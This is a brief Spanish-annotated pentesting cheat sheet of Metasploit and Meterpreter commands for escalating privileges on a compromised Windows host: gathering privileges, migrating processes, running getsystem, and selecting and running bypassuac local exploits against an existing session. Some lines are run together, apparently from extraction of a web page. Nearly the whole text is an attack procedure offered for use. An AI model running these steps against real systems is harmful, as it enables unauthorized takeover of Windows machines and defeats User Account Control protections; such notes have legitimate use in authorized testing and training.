Metasploit
use post/windows/gather/win_privs
set SESSION <id-session>
run# Meterpreter
ps
run post/windows/manage/migrate
ps
getsystem
getuidsearch bypassuac
# Seleccionar exploit adecuado de bypass UAC
use exploit/windows/local/bypassuac*
set SESSION <id-session>
exploit
# Desde sesión de meterpreter
run post/windows/manage/migrate
getsystem
getuidÚltima actualización